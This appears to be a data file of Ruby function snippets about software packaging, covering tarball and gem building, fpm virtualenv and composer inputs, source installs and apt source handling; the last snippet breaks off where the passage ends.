"def package(path, target)\n # Load manifest\n puts \"Load manifest...\"\n manifest = YAML::load_file(File.join(path, 'manifest.yml'))\n \n # Target directory for package files\n puts \"Target is: #{target}\"\n Dir.mkdir(target) if not File.exists?(target)\n \n # Package name\n package = \"#{manifest['name']}-#{manifest['version']}\"\n puts \"Package: #{package}\"\n \n # Tgz\n manifest['package'] = \"#{package}.tgz\"\n command = \"tar -czf #{package}.tgz --exclude pkg -C #{path} .\"\n puts \"Packing: #{command}\"\n system command\n \n # Move\n puts \"Finishing..\"\n FileUtils.mv(\"#{package}.tgz\", target)\n File.open(File.join(target, \"#{package}.yml\"), 'w') do |f|\n f.puts(manifest.to_yaml)\n f.close\n end\n \n puts \"Done.\"\nend",
"def input(package)\n path_to_package = download_if_necessary(package, version)\n\n if File.directory?(path_to_package)\n setup_py = File.join(path_to_package, \"setup.py\")\n else\n setup_py = path_to_package\n end\n\n if !File.exist?(setup_py)\n logger.error(\"Could not find 'setup.py'\", :path => setup_py)\n raise \"Unable to find python package; tried #{setup_py}\"\n end\n\n load_package_info(setup_py)\n install_to_staging(setup_py)\n end",
"def needpackage *args\n\t\tpackage *args\n\tend",
"def register_package(package, block = nil, package_set = main_package_set, file = nil)\n invalidate_ignored_package_names\n pkg = PackageDefinition.new(package, package_set, file)\n pkg.add_setup_block(block) if block\n @packages[package.name] = pkg\n metapackage pkg.package_set.name, pkg.autobuild\n metapackage \"#{pkg.package_set.name}.all\", pkg.autobuild\n pkg\n end",
"def package\n @package ||= Package.initialize_from_path(path: \"#{resource_path}/package\",\n client: @client)\n end",
"def prepare_source_dir(orig_pkginfo, options = Hash.new)\n pkginfo = orig_pkginfo.dup\n\n options, unknown_options = Kernel.filter_options options,\n :existing_source_dir => nil,\n :packaging_dir => File.join(@build_dir, debian_name(pkginfo))\n\n pkg_dir = options[:packaging_dir]\n if not File.directory?(pkg_dir)\n FileUtils.mkdir_p pkg_dir\n end\n\n # Only when there is no importer or when the VCS supports distribution (here git)\n # then we allow to use the local version\n support_local_import = false\n if !pkginfo.importer_type || pkginfo.importer_type == :git\n Packager.info \"Import from local repository is supported for #{pkginfo.name}\"\n support_local_import = true\n else\n Packager.info \"Import from local repository is not supported for #{pkginfo.name}\"\n end\n\n Packager.debug \"Preparing source dir #{pkginfo.name}\"\n # If we have given an existing source directory we should use it, \n # but only if it is a git repository\n pkg_target_importdir = File.join(pkg_dir, plain_dir_name(pkginfo))\n if support_local_import && existing_source_dir = options[:existing_source_dir]\n import_from_local_src_dir(pkginfo, existing_source_dir, pkg_target_importdir)\n # update to the new srcdir\n pkginfo.srcdir = pkg_target_importdir\n else\n pkginfo.import(pkg_target_importdir)\n end\n # remove these even on fresh imports. some repositories\n # have prepopulated build directories and similar\n remove_excluded_dirs(pkg_target_importdir)\n remove_excluded_files(pkg_target_importdir)\n\n pkginfo\n end",
"def create_package(logger:, release_model:, fix:, compiled_release:, package_meta:, release_dir:)\n name = package_meta['name']\n version = package_meta['version']\n\n package_attrs = {\n release: release_model,\n name: name,\n sha1: nil,\n blobstore_id: nil,\n fingerprint: package_meta['fingerprint'],\n version: version,\n }\n\n package = Models::Package.new(package_attrs)\n package.dependency_set = package_meta['dependencies']\n\n save_package_source_blob(logger, package, fix, package_meta, release_dir) unless compiled_release\n\n package.save\n end",
"def build_package\n # Force timestamp to be initialized before anything else. This gives us a\n # stable timestamp for the process.\n timestamp\n # Prepare the work area: copy files from root_path to work_path based on\n # the resolved Manifest.txt.\n prepare_work_area\n # Anything that has been modified locally needs to be reset.\n restore_modified_files\n # Save both the final release metadata and the in-package release metadata.\n save_release_metadata\n # Vendor the dependencies for the package.\n vendor_dependencies\n # Request that supporting plug-ins build the package.\n request_build_package\n end",
"def package!\n Backup::Packager.new(self).package!\n end",
"def convert_package(pkginfo, packaging_dir,\n gem_name: nil,\n patch_dir: nil\n )\n Packager.info \"Package Ruby: '#{pkginfo.name}' with gem_name: '#{gem_name}'\"\n\n # update dependencies in any case, i.e. independent if package exists or not\n deps = pkginfo.dependencies\n Dir.chdir(pkginfo.srcdir) do\n begin\n logname = \"package-ruby-#{pkginfo.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n logfile = File.join(log_dir, logname)\n\n gem = FileList[\"pkg/*.gem\"].first\n if not gem\n Packager.info \"#{self.class}: preparing gem generation in #{Dir.pwd}\"\n\n # Rake targets that should be tried for cleaning\n gem_clean_success = false\n Gem.clean_alternatives.each do |target|\n msg, status = Open3.capture2e(pkginfo.env, \"bundle exec rake #{target}\")\n if !status.success?\n Packager.info \"#{self.class}: failed to clean package '#{pkginfo.name}' using target '#{target}' #{msg} (see #{logfile})\"\n File.open(logfile,\"a+\") {|f| f.puts msg }\n else\n Packager.info \"#{self.class}: succeeded to clean package '#{pkginfo.name}' using target '#{target}'\"\n gem_clean_success = true\n break\n end\n end\n if not gem_clean_success\n Packager.warn \"#{self.class}: failed to cleanup ruby package '#{pkginfo.name}' -- continuing without cleanup\"\n end\n\n Packager.info \"#{self.class}: ruby package Manifest.txt is being autogenerated\"\n Package2Gem.generate_manifest_txt\n Package2Gem.cleanup_multiple_gemspec(gem_name)\n\n Packager.info \"#{self.class}: creating gem from package #{pkginfo.name} [#{File.join(log_dir, logname)}]\"\n\n if patch_pkg_dir(pkginfo.name, patch_dir, whitelist: [\"*.gemspec\", \"Rakefile\", \"metadata.yml\"])\n Packager.info \"#{self.class}: patched build files for ruby package before gem building: #{pkginfo.name}\"\n end\n\n # Allowed gem creation alternatives\n gem_creation_success = false\n\n # Gemspec often use the 'git ls -z' listings, which\n # might break if hidden files will be removed\n # without commiting -- so temporarily add and revert\n # again, to maintain the original commit id\n # TBD: or leave the commit and list the last N commits in the changelog\n Packager.info \"#{self.class}: temporarily commit changes in #{Dir.pwd}\"\n _,_,git_add_status = Open3.capture3(\"git add -A\")\n msg,git_commit_status = Open3.capture2(\"git commit -m 'Apaka: gem creation' --author 'Apaka Packager, <apaka@autocommit>'\")\n if !git_commit_status.success?\n Packager.info \"#{self.class}: commit failed: #{msg}\"\n end\n Gem.creation_alternatives.each do |target|\n msg, status = Open3.capture2e(pkginfo.env, \"bundle exec rake #{target}\")\n if !status.success?\n Packager.info \"#{self.class}: failed to create gem using target '#{target}' (see #{logfile})\"\n File.open(logfile,\"a+\") do |f|\n f.puts msg\n f.puts pkginfo.env\n end\n else\n Packager.info \"#{self.class}: succeeded to create gem using target '#{target}'\"\n gem_creation_success = true\n break\n end\n end\n if git_commit_status.success?\n Packager.info \"#{self.class}: git package status\"\n msg, git_revert = Open3.capture2(\"git reset --soft HEAD~1\")\n Packager.info \"#{self.class}: reversion of temporary commit failed\"\n end\n if not gem_creation_success\n raise RuntimeError, \"Debian: failed to create gem from RubyPackage #{pkginfo.name}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # other packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n if gem_name\n gem_name = gem.sub(Packaging.basename(pkginfo.name), gem_name)\n if gem != gem_name\n Packager.info \"#{self.class}: renaming #{gem} to #{gem_name}\"\n end\n else\n gem_name = gem\n end\n Packager.info \"#{self.class}: '#{pkginfo.name}' -- basename: #{Packaging.basename(pkginfo.name)} will be packaged as: #{gem_name}\"\n\n gem_final_path = File.join(packaging_dir, File.basename(gem_name))\n Packager.info \"#{self.class}: copy #{File.join(Dir.pwd, gem)} to #{gem_final_path}\"\n FileUtils.cp gem, gem_final_path\n return gem_final_path\n\n rescue Exception => e\n raise RuntimeError, \"#{self.class}: failed to create gem from RubyPackage #{pkginfo.name} -- #{e.message}\\n#{e.backtrace.drop(1).map{|s| \"\\t#{s}\"}}\"\n end\n end\n end",
"def install_custom!\n remote_file local_path do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n dpkg_package local_path\n end",
"def package\n build\n # there is no need for IPA or dSYM unless we have a device/macosx build,\n # so do that part only on iphoneos/macosx SDKs\n #\n if(@configuration.sdk.eql? \"iphoneos\") then\n package_ios_app\n package_dsym\n package_artifact unless !@configuration.zip_artifacts\n elsif (@configuration.sdk.eql? \"macosx\") then\n package_macos_app\n package_dsym\n package_artifact unless !@configuration.zip_artifacts\n else\n package_simulator_app\n end\n end",
"def move_package\n begin\n package_file = File.join(@tmpdir, 'pkg', \"#{@plugin.vendor}-#{@package_name}-#{@plugin.metadata[:version]}.tar.gz\")\n FileUtils.cp(package_file, '.')\n rescue => e\n puts 'Could not copy package to working directory'\n raise e\n end\n end",
"def package!\n Packager.package!(self)\n Cleaner.remove_packaging(self)\n end",
"def create(name)\n package = Package.new(name)\n package.name = name\n package.version = '1.0.0'\n empty_directory(name)\n empty_directory(File.join(name, 'operations'))\n empty_directory(File.join(name, 'resources'))\n template('metadata.rb.erb', File.join(name, 'metadata.rb'))\n\n if options[:vagrant]\n template('Vagrantfile.erb', File.join(name, 'Vagrantfile'))\n end\n\n if options[:docker]\n template('Dockerfile.erb.erb', File.join(name, 'Dockerfile.erb'))\n end\n end",
"def metapackage(name, *packages)\n Autoproj.workspace.manifest.metapackage(name, *packages)\nend",
"def with_package_source(source_url, source_repos = [], options = {})\n source_prefix = options[:source] ? 'deb-src' : 'deb'\n source_patterns = [source_prefix, source_url] + source_repos \n \n source_contents = File.read '/etc/apt/sources.list'\n sources = source_contents.split(/(\\r|\\n)+/)\n source_exists = sources.any? do |source_line|\n source_frags = source_line.split(' ')\n source_patterns.all? { |pattern| source_frags.any? { |frag| frag == pattern } }\n end\n\n unless source_exists\n File.open('/etc/apt/sources.list', 'a') do |f|\n f.write \"#{source_prefix} #{source_url} #{source_repos.join(' ')}\\n\"\n end\n update_package_metadata\n end\n \n begin\n yield\n ensure\n unless source_exists\n File.open('/etc/apt/sources.list', 'w') { |f| f.write source_contents }\n update_package_metadata \n end\n end\n end",
"def packaging_task(dir_path, pkg_name)\n chdir dir_path do\n sh \"#{ZIP} #{ZIP_ARGS} -r -o ../#{pkg_name} * **/*\"\n end\nend",
"def package_dependency(dep, bundle_info)\n info \"Starting packaging #{dep}\"\n\n instance = if dep.is_a? String\n dependency_object_by_name dep\n else\n dep\n end\n\n onError \"Invalid dependency name: #{dep}\" unless instance\n\n files = instance.getInstalledFiles\n\n if !files || files.empty?\n error \"Dependency '#{dep}' has no files to package\"\n return nil\n end\n\n # Add symbolic link targets\n links_found = true\n total_links = 0\n handled = []\n\n while links_found\n\n links_found = false\n\n files.each do |f|\n full = File.join(DependencyInstallFolder, f)\n\n next if handled.include? full\n\n next unless File.exist?(full) && File.symlink?(full)\n\n link_target = File.join(File.dirname(f), File.readlink(full))\n\n unless child_path?(DependencyInstallFolder,\n File.join(DependencyInstallFolder, link_target))\n onError 'symbolic link to be installed points outside the dependency folder: ' +\n link_target.to_s\n end\n\n links_found = true\n total_links += 1\n handled.append full\n files.append link_target\n end\n end\n\n handled = nil\n\n info \"Resolved #{total_links} symbolic links in packaged file list\" if total_links > 0\n\n precompiled_name = instance.getNameForPrecompiled + '_' + CurrentPlatform\n zip_name = precompiled_name + '.tar.xz'\n info_file = precompiled_name + '_info.txt'\n hash_file = precompiled_name + '_hash.txt'\n\n # Check that all exist\n Dir.chdir(DependencyInstallFolder) do\n files.each do |f|\n unless File.exist? f\n onError \"Dependency file that should be packaged doesn't exist: \" + f.to_s\n end\n end\n\n files_to_restore = strip_files_if_needed files\n\n File.open(info_file, 'w') do |f|\n f.puts \"RubySetupSystem precompiled library for #{CurrentPlatform}\"\n f.puts instance.Name + ' retrieved from ' + instance.RepoURL\n f.puts instance.Version.to_s + ' Packaged at ' + Time.now.to_s\n f.puts ''\n f.puts \"You can probably find license from the repo url if it isn't included here\"\n f.puts 'This info file is included in ' + zip_name\n end\n\n # When bundling everything needs to be made clean\n File.unlink zip_name if File.exist?(zip_name) && $options[:bundle]\n\n info \"Compressing files into #{zip_name}\"\n\n # Write a tar file with lzma compression\n runSystemSafe('tar', '-cJf', zip_name, info_file, *files)\n\n restore_stripped_files files_to_restore\n\n onError 'Failed to create zip file' unless File.exist? zip_name\n\n hash = SHA3::Digest::SHA256.file(zip_name).hexdigest\n\n # Write hash to file\n File.open(hash_file, 'w') do |f|\n f.puts hash\n end\n\n success \"Done with #{dep}, created: #{zip_name}\"\n info \"#{zip_name} SHA3: \" + hash\n # info \"#{zip_name} PLATFORM: \" + CurrentPlatform\n bundle_info[:dep_files].append zip_name\n return { name: precompiled_name, hash: hash }\n end\nend",
"def install(pkg)\n package pkg do\n action :install\n end\nend",
"def package(name)\n if name.respond_to? :cache_path\n name\n elsif @versions[name]\n Package.for(@sources[name], @versions[name], @files[name])\n end\n end",
"def unpack_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n sudo <<-SUDO\n sh -c '\n cd #{src_dir};\n test -d #{package_dir}.old && rm -fr #{package_dir}.old;\n test -d #{package_dir} && mv #{package_dir} #{package_dir}.old;\n #{src_package[:unpack]}\n chgrp -R #{group} #{package_dir}; \n chmod -R g+w #{package_dir};\n '\n SUDO\n end",
"def package_agent\n @logger.debug \"Packaging Bosh Agent to #{definition_dest_dir}/_bosh_agent.tar\"\n dst = File.join(definition_dest_dir, \"_bosh_agent.tar\")\n if File.directory? @agent_src_path\n Dir.chdir(@agent_src_path) do\n sh(\"bundle package > /dev/null 2>&1 && gem build bosh_agent.gemspec > /dev/null 2>&1\", {:on_error => \"Unable to build Bosh Agent gem\"})\n Dir.chdir(File.join(@agent_src_path, \"vendor\", \"cache\")) do\n sh(\"tar -cf #{dst} *.gem > /dev/null 2>&1\", {:on_error => \"Unable to package bosh gems\"})\n end\n sh(\"tar -rf #{dst} *.gem > /dev/null 2>&1\", {:on_error => \"Unable to add bosh_agent gem to #{dst}\"})\n end\n else\n FileUtils.cp @agent_src_path, dst\n end\n end",
"def locate_package(package_name, vers, verbose)\n local = has_local_package?(package_name)\n \n # It's true that we don't have a prerelase check here, but the\n # previous one we had didn't do anything, so it's better to have\n # none than one that doesn't work\n vers = \">= 0\" if vers == \">= 0-pre\"\n src_path = local ? locate_local_package(package_name) : \n BPM::Local.new.source_root(package_name, vers)\n\n return nil unless src_path\n\n pkg = BPM::Package.new(src_path)\n pkg.load_json # throws exception if json invalid\n pkg\n end",
"def with_package &block\n yield @package\n end",
"def create_package(type, data)\n begin\n dirpackage = FPM::Package::Dir.new\n dirpackage.attributes[:chdir] = @tmpdir\n dirpackage.input @libdir\n ospackage = dirpackage.convert(FPM::Package.const_get(@package_type))\n params(ospackage, type, data)\n filename = \"mcollective-#{package.metadata[:name].downcase}-#{type}-#{package.metadata[:version]}-#{package.iteration}#{@arch}.#{@package_type.downcase}\"\n\n do_quietly? do\n ospackage.output(filename)\n end\n\n puts \"Successfully built #{@package_type} '#{filename}'\"\n rescue Exception => e\n puts \"Failed to build package mcollective-#{package.metadata[:name].downcase}-#{type}. - #{e}\"\n ensure\n ospackage.cleanup if ospackage\n dirpackage.cleanup if dirpackage\n end\n end",
"def input(package)\n installdir = attributes[:virtualenv_install_location]\n m = /^([^=]+)==([^=]+)$/.match(package)\n package_version = nil\n\n is_requirements_file = (File.basename(package) == \"requirements.txt\")\n\n if is_requirements_file\n if !File.file?(package)\n raise FPM::InvalidPackageConfiguration, \"Path looks like a requirements.txt, but it doesn't exist: #{package}\"\n end\n\n package = File.join(::Dir.pwd, package) if File.dirname(package) == \".\"\n package_name = File.basename(File.dirname(package))\n logger.info(\"No name given. Using the directory's name\", :name => package_name)\n package_version = nil\n elsif m\n package_name = m[1]\n package_version = m[2]\n self.version ||= package_version\n else\n package_name = package\n package_version = nil\n end\n\n virtualenv_name = package_name\n\n self.name ||= package_name\n\n if self.attributes[:virtualenv_fix_name?]\n self.name = [self.attributes[:virtualenv_package_name_prefix],\n self.name].join(\"-\")\n end\n\n # prefix wins over previous virtual_install_location behaviour\n virtualenv_folder =\n if self.attributes[:prefix]\n self.attributes[:prefix]\n else\n File.join(installdir,\n virtualenv_name)\n end\n\n virtualenv_build_folder = build_path(virtualenv_folder)\n\n ::FileUtils.mkdir_p(virtualenv_build_folder)\n\n if self.attributes[:virtualenv_system_site_packages?]\n logger.info(\"Creating virtualenv with --system-site-packages\")\n safesystem(\"virtualenv\", \"--system-site-packages\", virtualenv_build_folder)\n else\n safesystem(\"virtualenv\", virtualenv_build_folder)\n end\n\n pip_exe = File.join(virtualenv_build_folder, \"bin\", \"pip\")\n python_exe = File.join(virtualenv_build_folder, \"bin\", \"python\")\n\n # Why is this hack here? It looks important, so I'll keep it in.\n safesystem(python_exe, pip_exe, \"install\", \"-U\", \"-i\",\n attributes[:virtualenv_pypi],\n \"pip\")\n\n extra_index_url_args = []\n if attributes[:virtualenv_pypi_extra_index_urls]\n attributes[:virtualenv_pypi_extra_index_urls].each do |extra_url|\n extra_index_url_args << \"--extra-index-url\" << extra_url\n end\n end\n\n find_links_url_args = []\n if attributes[:virtualenv_find_links_urls]\n attributes[:virtualenv_find_links_urls].each do |links_url|\n find_links_url_args << \"--find-links\" << links_url\n end\n end\n\n target_args = []\n if is_requirements_file\n target_args << \"-r\" << package\n else\n target_args << package\n end\n\n pip_args = [python_exe, pip_exe, \"install\", \"-i\", attributes[:virtualenv_pypi]] << extra_index_url_args << find_links_url_args << target_args\n safesystem(*pip_args.flatten)\n\n if attributes[:virtualenv_setup_install?]\n logger.info(\"Running PACKAGE setup.py\")\n setup_args = [python_exe, \"setup.py\", \"install\"]\n safesystem(*setup_args.flatten)\n end\n\n if ! is_requirements_file && package_version.nil?\n frozen = safesystemout(python_exe, pip_exe, \"freeze\")\n frozen_version = frozen[/#{package}==[^=]+$/]\n package_version = frozen_version && frozen_version.split(\"==\")[1].chomp!\n self.version ||= package_version\n end\n\n ::Dir[build_path + \"/**/*\"].each do |f|\n if ! File.readable? f\n File.lchmod(File.stat(f).mode | 444)\n end\n end\n\n ::Dir.chdir(virtualenv_build_folder) do\n safesystem(\"virtualenv-tools\", \"--update-path\", virtualenv_folder)\n end\n\n if !attributes[:virtualenv_other_files_dir].nil?\n # Copy all files from other dir to build_path\n Find.find(attributes[:virtualenv_other_files_dir]) do |path|\n src = path.gsub(/^#{attributes[:virtualenv_other_files_dir]}/, '')\n dst = File.join(build_path, src)\n copy_entry(path, dst, preserve=true, remove_destination=true)\n copy_metadata(path, dst)\n end\n end\n\n remove_python_compiled_files virtualenv_build_folder\n\n # use dir to set stuff up properly, mainly so I don't have to reimplement\n # the chdir/prefix stuff special for tar.\n dir = convert(FPM::Package::Dir)\n # don't double prefix the files\n dir.attributes[:prefix] = nil\n if attributes[:chdir]\n dir.attributes[:chdir] = File.join(build_path, attributes[:chdir])\n else\n dir.attributes[:chdir] = build_path\n end\n\n cleanup_staging\n # Tell 'dir' to input \".\" and chdir/prefix will help it figure out the\n # rest.\n dir.input(\".\")\n @staging_path = dir.staging_path\n dir.cleanup_build\n\n end",
"def package_agent\n @logger.info \"Packaging Bosh Agent to #{definition_dest_dir}/_bosh_agent.tar\"\n dst = File.join(definition_dest_dir, \"_bosh_agent.tar\")\n if File.directory? @agent_src_path\n @logger.info \"Tarring up Bosh Agent\"\n Dir.chdir(@agent_src_path) do\n sh(\"tar -cf #{dst} *.gem > /dev/null 2>&1\", {:on_error => \"Unable to package bosh gems\"})\n end\n else\n FileUtils.cp @agent_src_path, dst\n end\n end",
"def ruby_package(options)\n package_common(:ruby, options) do |pkg|\n # Documentation code. Ignore if the user provided its own documentation\n # task, or disabled the documentation generation altogether by setting\n # rake_doc_task to nil\n if !pkg.has_doc? && pkg.rake_doc_task\n pkg.with_doc\n end\n if !pkg.test_utility.has_task?\n if !pkg.test_utility.source_dir\n test_dir = File.join(pkg.srcdir, 'test')\n if File.directory?(test_dir)\n pkg.test_utility.source_dir = test_dir\n end\n end\n\n if pkg.test_utility.source_dir\n pkg.with_tests\n end\n end\n\n yield(pkg) if block_given?\n end\nend",
"def install_from_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n unpack_src(src_package, src_dir)\n sudo <<-SUDO\n sh -c '\n cd #{package_dir};\n #{src_package[:configure]}\n #{src_package[:make]}\n #{src_package[:install]}\n #{src_package[:post_install]}\n '\n SUDO\n end",
"def generate_pkg_contents\n shellout!(\"pkgsend generate #{source_dir} | pkgfmt > #{pkg_manifest_file}.1\")\n shellout!(\"pkgmogrify -DARCH=`uname -p` #{pkg_manifest_file}.1 #{pkg_metadata_file} #{transform_file} | pkgfmt > #{pkg_manifest_file}.2\")\n end",
"def packaging_task(dir_path, pkg_name)\n chdir dir_path do\n sh \"#{ZIP} -9 -r -o ../#{pkg_name} * **/*\"\n end\nend",
"def inject_package(hash, info, package)\n arch = info[\"Architecture\"]\n arch = arch == \"all\" ? all_map : [arch]\n arch.map do |arch|\n package_file_name = File.join(\n package_root, package_bucket, origin,\n dist, component, \"binary-#{arch}\",\n File.basename(package)\n )\n hash.deep_merge!(\n \"apt\" => {\n origin => {\n dist => {\n \"components\" => {\n component => {\n \"binary-#{arch}\" => {\n info[\"Package\"] => {\n info[\"Version\"] => info.merge!(\n \"Filename\" => package_file_name,\n \"Size\" => File.size(package),\n ),\n },\n },\n \"binary-i386\" => {},\n },\n },\n },\n },\n },\n )\n File.join(\"apt\", origin, package_file_name)\n end\n end",
"def action_package(type)\n name = prompt('Name : ')\n dest = Automation::Converter.to_unix_path(prompt('Destination : '))\n require REQUIRE_MAP[type] % {name: name}\n\n raise Automation::ConsoleError.new(\"No definition found for package '#{name}'\") unless PACKAGE_CLASS.has_key?(name)\n plugin = PACKAGE_CLASS[name].new\n plugin.package(dest)\n puts \"Packaged '#{type}' - #{plugin.name}\"\n end",
"def install_gem_from_src(gem_src_dir, options = {})\n raise SourcePathMissing unless File.directory?(gem_src_dir)\n raise GemPathMissing if options[:install_dir] && !File.directory?(options[:install_dir])\n \n gem_name = File.basename(gem_src_dir)\n gem_pkg_dir = File.expand_path(File.join(gem_src_dir, 'pkg'))\n\n # We need to use local bin executables if available.\n thor = which('thor')\n rake = which('rake')\n\n # Handle pure Thor installation instead of Rake\n if File.exists?(File.join(gem_src_dir, 'Thorfile'))\n # Remove any existing packages.\n FileUtils.rm_rf(gem_pkg_dir) if File.directory?(gem_pkg_dir)\n # Create the package.\n FileUtils.cd(gem_src_dir) { system(\"#{thor} :package\") }\n # Install the package using rubygems.\n if package = Dir[File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")].last\n FileUtils.cd(File.dirname(package)) do\n install_gem(File.basename(package), options.dup)\n return \n end\n else\n raise Merb::GemInstallError, \"No package found for #{gem_name}\"\n end\n # Handle standard installation through Rake\n else\n # Clean and regenerate any subgems for meta gems.\n Dir[File.join(gem_src_dir, '*', 'Rakefile')].each do |rakefile|\n FileUtils.cd(File.dirname(rakefile)) { system(\"#{rake} clobber_package; #{rake} package\") } \n end\n \n # Handle the main gem install.\n if File.exists?(File.join(gem_src_dir, 'Rakefile'))\n # Remove any existing packages.\n FileUtils.cd(gem_src_dir) { system(\"#{rake} clobber_package\") }\n # Create the main gem pkg dir if it doesn't exist.\n FileUtils.mkdir_p(gem_pkg_dir) unless File.directory?(gem_pkg_dir)\n # Copy any subgems to the main gem pkg dir.\n Dir[File.join(gem_src_dir, '**', 'pkg', '*.gem')].each do |subgem_pkg|\n FileUtils.cp(subgem_pkg, gem_pkg_dir)\n end\n \n # Finally generate the main package and install it; subgems \n # (dependencies) are local to the main package.\n FileUtils.cd(gem_src_dir) do \n system(\"#{rake} package\")\n FileUtils.cd(gem_pkg_dir) do \n if package = Dir[File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")].last\n # If the (meta) gem has it's own package, install it.\n install_gem(File.basename(package), options.dup) \n else\n # Otherwise install each package seperately.\n Dir[\"*.gem\"].each { |gem| install_gem(gem, options.dup) }\n end\n end\n return\n end\n end\n end\n raise Merb::GemInstallError, \"No Rakefile found for #{gem_name}\"\n end",
"def deploy(package_path, opts={}, &block)\n end",
"def for_package(package)\n data = File.read(path_for(package))\n hash = JSON.parse(data, symbolize_names: true)\n new(package, hash)\n rescue Errno::ENOENT\n raise NoPackageMetadataFile.new(package.path)\n end",
"def package *args\n\t\targs.each do | name |\n\t\t\treturn if haspackage? name\n\t\tend\n\t\t@cf.cfp_logger.notify VERBOSE_MAJOR,\"Skipping - package #{args.join(',')} not installed\"\n\t\traise PackageNotInstalledError.new('Package '+args.join(\",\")+' not installed')\n\tend",
"def package_dir\r\n \"${0%/#{target_name}}\"\r\n end",
"def package_project(source, dest)\n FileUtils.mkdir_p(dest)\n FileUtils.cp(File.join(source, BUILDFILE), File.join(dest, BUILDFILE))\n PACKAGE_FILES.each do |file|\n cp_if_exists(File.join(source, file), dest)\n end\n rules = @project_config.publish_rules.empty? ? PUBLISH_RULES : @project_config.publish_rules\n\n rules.each do |from, to|\n log.debug \"Processing rule #{from} => #{to}\"\n cp_if_exists(File.join(source, from), File.join(dest, to))\n end\n end",
"def package(name)\n Packaged.instance self , name\n end",
"def generate_package\n if @language_package_service.autograded?\n new_package = @language_package_service.generate_package(@question.attachment)\n @question.file = new_package if new_package.present?\n else\n templates = @language_package_service.submission_templates\n @question.imported_attachment = nil\n @question.import_job_id = nil\n @question.non_autograded_template_files = templates.map do |template|\n Course::Assessment::Question::ProgrammingTemplateFile.new(template)\n end\n end\n end",
"def package_setup\n raise NotImplementedError\n end",
"def add_package(package)\n [package_handler(File.extname(package).tr(\".\", \"\")).add(content, package)].flatten.compact\n end",
"def input(vnd_pkg_path)\n\n # general params\n in_bundle = vnd_pkg_path.gsub(/^(.+\\/+)*vendor\\/+|\\/(?=\\/)|\\/+$/, \"\")\n @name = in_bundle.gsub(/[\\W]+/, \"-\")\n json = {}\n if @once\n @once = true\n raise FPM::InvalidPackageConfiguration, \"You can't input multiple bundle names. Only one package can be built at a time currently. Use a shell loop please.\"\n elsif in_bundle =~ /^composer\\/\\w+\\.\\w+/\n raise FPM::InvalidPackageConfiguration, \"composer/*.* files specified as input. Supply only one bundle id.\"\n end\n\n # copying mode\n if File.exist?(\"vendor/\" + in_bundle)\n json = parse_lock(\"composer.lock\", in_bundle)[in_bundle]\n # localize contents below vendor/*/*/ input directory\n ::Dir.chdir(\"./vendor/#{in_bundle}/#{json['target-dir']}/\") do\n FileUtils.cp_r(glob(\"./*\"), build_path)\n end\n else\n # download one package (and dependencies, which are thrown away afterwards)\n ::Dir.chdir(staging_path) do\n ver = attributes[:composer_ver]\n safesystem(\n composer, \"require\", \"--prefer-dist\", \"--update-no-dev\", \"--ignore-platform-reqs\",\n \"--no-ansi\", \"--no-interaction\", in_bundle, *(ver ? [ver] : [])\n )\n # localize Vnd/Pkg folder\n json = parse_lock(\"composer.lock\", in_bundle)[in_bundle]\n FileUtils.mv(glob(\"./vendor/#{in_bundle}/#{json['target-dir']}/*\"), build_path)\n FileUtils.rm_r(glob(\"#{staging_path}/*\"))\n end\n end\n\n #-- staging\n # At this point the build_path contains just the actual class files, etc.\n # Conversion to sys/phar/sysphar is handled in convert() along with the\n # dependency translation.\n composer_json_import(json)\n @target_dir = json.include?(\"target-dir\") ? json[\"target-dir\"] : in_bundle\n attributes[:phar_format] = \"zip+gz\" unless attributes[:phar_format_given?]\n end",
"def packaging\n compiler && @compiler.class.packaging\n end",
"def package_dir_path\n \"#{package_dir}/#{package_name}\"\n end",
"def is_metapackage?(package_name)\n raise RuntimeError, \"#{self.class} needs to overwrite is_metapackage?\"\n end",
"def upgrade_direct!\n package \"Chef Development Kit v#{package_metadata[:version]}\" do\n source package_metadata[:url]\n checksum package_metadata[:sha256]\n end\n end",
"def install_gem_from_src(gem_src_dir, options = {})\n if !File.directory?(gem_src_dir)\n raise \"Missing rubygem source path: #{gem_src_dir}\"\n end\n if options[:install_dir] && !File.directory?(options[:install_dir])\n raise \"Missing rubygems path: #{options[:install_dir]}\"\n end\n\n gem_name = File.basename(gem_src_dir)\n gem_pkg_dir = File.expand_path(File.join(gem_src_dir, 'pkg'))\n\n # We need to use local bin executables if available.\n thor = \"#{Gem.ruby} -S #{which('thor')}\"\n rake = \"#{Gem.ruby} -S #{which('rake')}\"\n\n # Handle pure Thor installation instead of Rake\n if File.exists?(File.join(gem_src_dir, 'Thorfile'))\n # Remove any existing packages.\n FileUtils.rm_rf(gem_pkg_dir) if File.directory?(gem_pkg_dir)\n # Create the package.\n FileUtils.cd(gem_src_dir) { system(\"#{thor} :package\") }\n # Install the package using rubygems.\n if package = Dir[File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")].last\n FileUtils.cd(File.dirname(package)) do\n install_gem(File.basename(package), options.dup)\n return true\n end\n else\n raise Gem::InstallError, \"No package found for #{gem_name}\"\n end\n # Handle standard installation through Rake\n else\n # Clean and regenerate any subgems for meta gems.\n Dir[File.join(gem_src_dir, '*', 'Rakefile')].each do |rakefile|\n FileUtils.cd(File.dirname(rakefile)) do \n system(\"#{rake} clobber_package; #{rake} package\")\n end\n end\n\n # Handle the main gem install.\n if File.exists?(File.join(gem_src_dir, 'Rakefile'))\n # Remove any existing packages.\n FileUtils.cd(gem_src_dir) { system(\"#{rake} clobber_package\") }\n # Create the main gem pkg dir if it doesn't exist.\n FileUtils.mkdir_p(gem_pkg_dir) unless File.directory?(gem_pkg_dir)\n # Copy any subgems to the main gem pkg dir.\n Dir[File.join(gem_src_dir, '*', 'pkg', '*.gem')].each do |subgem_pkg|\n dest = File.join(gem_pkg_dir, File.basename(subgem_pkg))\n FileUtils.copy_entry(subgem_pkg, dest, true, false, true) \n end\n\n # Finally generate the main package and install it; subgems\n # (dependencies) are local to the main package.\n FileUtils.cd(gem_src_dir) do\n system(\"#{rake} package\")\n 